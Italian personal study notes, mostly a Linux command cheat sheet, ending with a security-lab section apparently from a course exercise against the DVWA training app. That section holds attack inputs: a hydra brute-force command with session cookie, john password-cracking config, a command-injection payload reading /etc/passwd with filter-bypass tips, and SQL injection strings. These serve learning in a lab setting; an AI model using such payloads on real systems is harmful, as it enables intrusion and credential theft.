//Risoluzione problema Google Chrome
ls -ld .config/google_chrome .cache/google_chrome
rm -rf .config/google_chrome .cache/google_chrome
------------------------------------

id
per scoprire di quali gruppi si fa parte

------------------------------------

df
per vedere l'organizzazione delle partizioni 
------------------------------------

fdisk -l 
elenca le partizioni
------------------------------------

resize2fs device
per ridimensionare una partizione(disco)

------------------------------------

mount -a
per tyestare che funzioni tutto
------------------------------------

SWAP
partizione creata come spazio di emergenza per evitare che in caso di sovraccarico si 
killino processi a caso

------------------------------------

vagrant halt
per fermare MV avviata con vagrant up
------------------------------------

df -h
per vedere in dimensioni human readeble
------------------------------------

ssh default df
per eseguire comando su macchina virtuale senza avviarla e chiuderla con up e halt
------------------------------------
 . ./.bashrc
 ricompila grazie al comando . -> prende come argomento un nome di file(script) e lo esegue riga per riga

------------------------------------

man -a <command>
restituisce la lista di man che contengono quel comando
------------------------------------

man -k passwd
restituisce le man pages contenente quella keyword
------------------------------------

sudo mandb
carica tutte le man pages presenti nel db
------------------------------------
Ctrl + R 
Da un history search dei comandi digitati da terminale
------------------------------------


26-03-2024

//apro un nuovo file sia in lettura che in scrittura per 
exec 3<>$(tty)

read -u fd
per non leggere come di default su stdin 

Il comando tr:
trasla set alfabetici
tr 'a-z' 'A-Z' ----> toUpperCase



bash -x script.sh per debuggare


history | tail 
visualizza gli ultimi comandi lanciati


con crontab a differenza di at quando gli passo una nuova tabella la rimpiazza invece di aggiungere
è necessario appendere la nuova tabella a la vecchia e poi:
crontab crontab.new


grep -v "pattern"
stampa tutte le righe che non matchano con un pattern

















-------------------------
--------------------------
//LAB SICUREZZA

ip r l

grep sole file.txt ! grep mare
trova parole come solemare o maresole senza usare Regex

less e poi /
per cercare una parola


vagrant destroy

sudo ip a del [ipaddr] dev eth1
sudo ip a ADD [ipaddr] dev eth1


dig mx google.com

cewl 
è uno strumento di scraping
data una vittima e un suo domino scarica tutte le pagine dedicate
e specificando dei parametri(keyword) per ottenere
una lista di paroli che sono PROBABILI PASsWORD.


unshadow 
combina password e shadow
con tutte le info: username password e info utente



------------------------------------------------
[Incremental:MIO]
File = $JOHN/ascii.chr
MinLen = 2
MaxLen = 4
CharCount = 95

john --format=crypt kali.pwd 
cosi prova password di nr di char incremental da 2 a 4

------------------------------------------------




sudo -l
una volta entrato in un host remoto vocntrollo se mi ha lasciato la 
possibilita di diventare amministratore

------------------------------------------------
┌──(root㉿kali)-[~]
└─# su - www
┌──(www㉿kali)-[~]
└─$ sudo -l
Matching Defaults entries for www on kali:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www may run the following commands on kali:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
------------------------------------------------


/.htpasswd (Status: 403)
File per conservare password in http(hash). in questo caso vulnerabile
si trova all'interno della stessa dir del server.
---------------------------------------------------------

burp
fa da proxy per richieste tra client e browser web


---------------------------------------------------------------------
hydra $IP_CONTAINER_DVWA -L SecLists/Usernames/topusernames-shortlist.txt -P SecLists/Passwords/xato-net-10-millionpasswords-100.txt http-get-form
"/vulnerabilities/brute/index.php:username=^USER^&password=^P
ASS^&Login=Login:Username and/or password
incorrect.:H=Cookie: security=low;
PHPSESSID=f0q0t1rfcj64klid5qh6uhpds4"


utilizzo hydra per tentare username e passwd al posto di ^USER^ e ^PASS^ 
specificando anche il phpsessionid per simulare di essere dentro ad une sessione

---------------------------------------------------------------------

facendo file inclusion, inserendo nell'url /etc/hosts
sto facendo ENUMERAZIONE.


----------------------
ip=8.8.8.8;cat+/etc/passwd&Submit=Submit
uso il + al posto dello spazio(HTTP)


-----------------
per la command injection, se ad esempio vengono sostituiti i caratteri
&& e ; posso utilizzare altra combinazione logica:
-> || e' un OR quindi il primo comando vuoto, esegue il secondo
-> | utilizzo la pipe 

-----------------------------
' OR '1'='1
lo utilizzo come input per un sql,
considerando che fa:
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";


 union select NULL #
 Uso il # cosi tutto quello dopo è inteos come commento e non considerato.


*
se ho un limite di caratteeri in un campo in cui voglio fare un injection di qualche tipo,
posso o modificare la lunghezza del campo dall'inspect del browser o usare burp












DOMANDE???
Cosa cambia tra hydra e john?
